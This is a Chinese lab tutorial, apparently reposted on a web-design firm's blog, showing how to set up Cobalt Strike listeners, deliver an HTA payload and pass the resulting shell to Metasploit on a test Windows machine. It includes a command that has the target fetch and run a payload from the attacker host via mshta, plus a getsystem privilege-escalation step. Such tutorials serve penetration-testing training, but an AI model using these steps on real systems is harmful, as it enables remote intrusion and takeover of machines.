十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
这篇文章主要介绍如何使用cobaltstrike接口传递msf中的shell,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!
专注于为中小企业提供成都网站建设、网站制作服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业南部免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了上千余家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。
Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。功能挺多,文章只是讲了工具的核心功能
渗透机:kali,靶机:ws08。
kali:172.16.1.34
ws08:172.16.1.24
agscript 拓展应用的脚本
clint 检查profile的错误信息
teamserver 服务端程序
cobaltstrike 客户端程序
cobaltstrike.jar(java跨平台)客户端
logs 目录记录与目标主机的信息
third-party 第三方工具
启动服务器
执行./teamserver 172.16.1.34 p@ssw0rd
不要关闭窗口,然后本机启动cobalt strike连接测试客户端连接
枚举用户
用户通信
/msg Ro0t xxxxxx
上面是启动和操作方法,下面看下cobaltstrike监听模块
Beacon为cs内置监听器,需要在目标机上执行相应的payload,获取shell到cs中。包含了smb,DNS, HTTP等模块
=============================================================
windows/beacon_http/reverse_dns_txt
windows/beacon_http/reverse_http x86/x64
模块有很多,这里不列举了
foreigh为与外部相结合的监听器,主要用于msf结合,比如获取meterpreter到shell中
=============================================================
在cobalt strike中添加一个Listener,创建beacon Listener
创建Foreign Listener
save,在主配置菜单中依次点击,Attack,packages,HTML Application
选择Listener生成与方法,有powershell,vba以及exe三种可执行文件
选择ps,保存到桌面上、
依次点击Attacks,webdirve-by,hostfile、通过web服务打开连接通道
然后再弹出的窗口中找到文件一栏,点击文件夹按钮,找到需要添加的恶意脚本.hta、添加完后点击launch启动web服务模块
此时我们查看日志信息提示我们在靶机客户端访问连链接
回到靶机,打开终端使用命令mshta.exe http://172.16.1.34:80/download/file.txt命令
kali查看,新连接已经建立起来了
默认情况下此处链接有60s的心跳线,为避免流量过大可以适当调整间隔。
右击会话选择interact打开交互会话终端
可以查看下当前权限,可以使用getsystem提权试试。
打开一个新的终端,进入msf设置一个监听载荷,lhost设置成本地ip,然后expliit -j
回到cobalt里,右击spawn生成新的listener。然后在弹出的窗口中点击add添加一个新监听器
此时监听设置完,然后进入msf终端来传递cobaltstrike的shell
回到msf可以发现已经和靶机建立起了会话
以上是“如何使用cobaltstrike接口传递msf中的shell”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注创新互联行业资讯频道!